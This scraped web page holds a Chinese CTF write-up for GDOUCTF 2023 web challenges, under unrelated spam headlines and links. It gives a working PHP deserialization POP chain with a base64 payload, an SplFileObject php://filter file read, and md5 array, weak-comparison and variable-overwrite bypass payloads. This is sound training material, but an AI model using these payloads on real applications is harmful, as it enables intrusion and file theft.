当前位置: 首页 > news >正文

商业网站如何备案编辑wordpress代码

商业网站如何备案,编辑wordpress代码,织梦搭建企业网站,滨海新区商城网站建设[GDOUCTF 2023]hate eat snake 考察#xff1a;js代码审计 打开题目#xff0c;发现需要坚持60秒#xff0c;那么简单的一个思路就是修改得分的变量60即可 办法1#xff1a;修改变量 右键查看源代码#xff0c;之后发现有一个snake.js的文件#xff0c;ctrlf搜索i…[GDOUCTF 2023]hate eat snake 考察js代码审计 打开题目发现需要坚持60秒那么简单的一个思路就是修改得分的变量60即可 办法1修改变量 右键查看源代码之后发现有一个snake.js的文件ctrlf搜索if发现判断过关的条件是getScore60 搜索发现getScore在Snake.prototype中 在控制台执行 payload Snake.prototype.getScore () 61控制台开始调用函数 在游戏界面再按一下空格得到flag 方法2 先玩游得到分数后在放着界面停留60秒再按空格获取flag [GDOUCTF 2023]泄露的伪装 考察目录扫描php伪协议 由于环境打不开了我就根据别人的wp提供下思路 思路打开题目----目录扫描rar文件下载---代码审计---php伪协议inputdata get参数为?cxkphp://input post参数为ctrl 或者使用下面一种  ?cxkdata://text/plain,ctrl[GDOUCTF 2023]反方向的钟  考察反序列化原生类SplFileObject 打开题目发现一大串代码看到类了猜测考察反序列化需要构造poc链 ?php error_reporting(0); highlight_file(__FILE__); // flag.php class teacher{public $name;public $rank;private $salary;public function __construct($name,$rank,$salary 10000){$this-name $name;$this-rank $rank;$this-salary $salary;} }class classroom{public $name;public $leader;public function __construct($name,$leader){$this-name $name;$this-leader $leader;}public function hahaha(){if($this-name ! one class or $this-leader-name ! ing or $this-leader-rank !department){return False;}else{return True;}} }class school{public $department;public $headmaster;public function __construct($department,$ceo){$this-department $department;$this-headmaster $ceo;}public function IPO(){if($this-headmaster ong){echo Pretty Good ! Ctfer!\n;echo new $_POST[a]($_POST[b]);}}public function __wakeup(){if($this-department-hahaha()) {$this-IPO();}} }if(isset($_GET[d])){unserialize(base64_decode($_GET[d])); } ? 分析 能利用原生类SplFileObject读取文件 找到最核心的IPO()关键点new $_POST[‘a’] ($_POST[‘b’]) 可以POST请求利用原生类读取文件获得flag(base64编码) 步骤 要执行IPO()看到__wakeup()下要先执行hahaha() 再找到hahaha()所在的类为classroom要使返回为真三个变量赋值得为对应的值leader指向name和rank的值也就说明$leadernew teacher()发现name和rank是在teacher类那里 构造poc链 ?php class teacher{public $nameing;public $rankdepartment;private $salary; }class classroom{public $nameone class;public $leader; }class school{public $department;public $headmasterong; }$anew school(); $a-departmentnew classroom(); $a-department-leadernew teacher(); echo base64_encode(serialize($a));Tzo2OiJzY2hvb2wiOjI6e3M6MTA6ImRlcGFydG1lbnQiO086OToiY2xhc3Nyb29tIjoyOntzOjQ6Im5hbWUiO3M6OToib25lIGNsYXNzIjtzOjY6ImxlYWRlciI7Tzo3OiJ0ZWFjaGVyIjozOntzOjQ6Im5hbWUiO3M6MzoiaW5nIjtzOjQ6InJhbmsiO3M6MTA6ImRlcGFydG1lbnQiO3M6MTU6IgB0ZWFjaGVyAHNhbGFyeSI7aToxMDAwMDt9fXM6MTA6ImhlYWRtYXN0ZXIiO3M6Mzoib25nIjt9之后利用原生类SplFileObject读取文件 a为类,b用php协议读取flag.php   /代码中说了flag在flag.php中 所以POST的payload为: aSplFileObjectbphp://filter/readconvert.base64-encode/resourceflag.php 进行访问 得到base64编码我们再进行解码得到flag ?php $flag NSSCTF{c18adac3-acf0-4efa-ab63-10279c78c08d}; ? [GDOUCTF 2023]受不了一点 考察md5绕过强/弱类型比较变量覆盖 打开题目得到源码 ?php error_reporting(0); header(Content-type:text/html;charsetutf-8); if(isset($_POST[gdou])isset($_POST[ctf])){$b$_POST[ctf];$a$_POST[gdou];if($_POST[gdou]!$_POST[ctf] md5($a)md5($b)){if(isset($_COOKIE[cookie])){if ($_COOKIE[cookie]j0k3r){if(isset($_GET[aaa]) isset($_GET[bbb])){$aaa$_GET[aaa];$bbb$_GET[bbb];if($aaa114514 $bbb114514 $aaa!$bbb){$give cancanwordflag;$get hacker!;if(isset($_GET[flag]) isset($_POST[flag])){die($give);}if($_POST[flag] flag || $_GET[flag] flag){die($get);}foreach ($_POST as $key $value) {$$key $value;}foreach ($_GET as $key $value) {$$key $$value;}echo $flag;}else{echo 洗洗睡吧;}}else{echo 行不行啊细狗;}} } else {echo 菜菜; } }else{echo 就这?; } }else{echo 别来沾边; } ? 别来沾边 初步分析我们需要进行四组绕过  if($_POST[gdou]!$_POST[ctf] md5($a)md5($b)) 这里我们需要进行md5绕过并且为强类型比较绕过我们可以考虑用数组绕过也可以用md5碰撞进行绕过 md5()函数无法处理数组如果传入的为数组会返回NULL所以两个数组经过加密后得到的都是NULL,也就是相等的。  例如 a[]1b[]2 gdou[]1ctf[]2 //绕过第一步 这里为简单的cookie赋值我们用火狐浏览器的hackbar插件就能修改cookie的值  if ($_COOKIE[cookie]j0k3r 这里为弱比较类型的绕过我们可以用小数点进行绕过 也可以后面加字符进行绕过 if($aaa114514 $bbb114514 $aaa!$bbb 构造payload aaa114514bbb114514.a 接着下面这里考察的是变量覆盖 if($_POST[flag] flag || $_GET[flag] flag){die($get);}foreach ($_POST as $key $value) {$$key $value;}foreach ($_GET as $key $value) {$$key $$value;}echo $flag; 直接构造payload变色的变量可以改变但与后面的需要相同 123flagflag123 最后抓包构造所有的payload POST /?aaa114514bbb114514a123flagflag123 post参数 gdou[]1ctf[]2 [GDOUCTF 2023]EZ WEB 考察http协议 由于环境开启不了看了下别人的wp讲讲思路 思路右键查看网页源代码---访问有关于flag的路由---BP抓包修改请求方式为POST
http://www.w-s-a.com/news/184493/

相关文章:

  • 百度推广点击收费标准自己如何做网站优化
  • 安徽省建设监理网站广州澄网站建设公司
  • 做简历用什么网站俄罗斯搜索引擎浏览器官网入口
  • dw里响应式网站怎么做制作网站需要多少时间
  • 网站如何做双链路示范学校建设专题网站
  • 网站开发北京影视网站seo描述
  • 高端网站定制建设公司哪家好企业网络推广技巧
  • 建设公司网站的内容建筑设计图片
  • 用ps怎么做网站的效果图互联网营销师报名入口官网
  • 网站的后端怎么开发网站 白名单
  • 济宁中小企业网站建设wordpress爆破工具
  • 零基础网站建设视频商城系统平台有哪些
  • 那个网站做百科好过wordpress删除
  • 优化网站排名怎么制作网站建设数据库模板
  • 哪个建站软件比较好带论坛都有什么公司需要网站建设
  • 同城便民网站开发自己免费怎么制作网站吗
  • 数据库网站开发教程网站内部优化是什么意思
  • 哈尔滨建站怎么做广西seo快速排名
  • 公司网站建设的不足企业文档管理wordpress
  • .net做的网站代码网站怎么加二级域名
  • 网站建设方案对比分析报告成都短视频代运营
  • 企业所得税税率知多少重庆seo什么意思
  • ftp如何修改网站备案号百度云建站
  • 免费做网站空间dede二手车网站源码
  • 网站服务器需要多大设计网站公司开发
  • asp 网站权限设计做网站业务员
  • 做棋牌网站违法嘛网络服务网络推广
  • 专门做推广的网站吗免费建域名网站
  • 在百度做网站株洲网站平台搭建
  • 用node做的网站南宁网站定制开发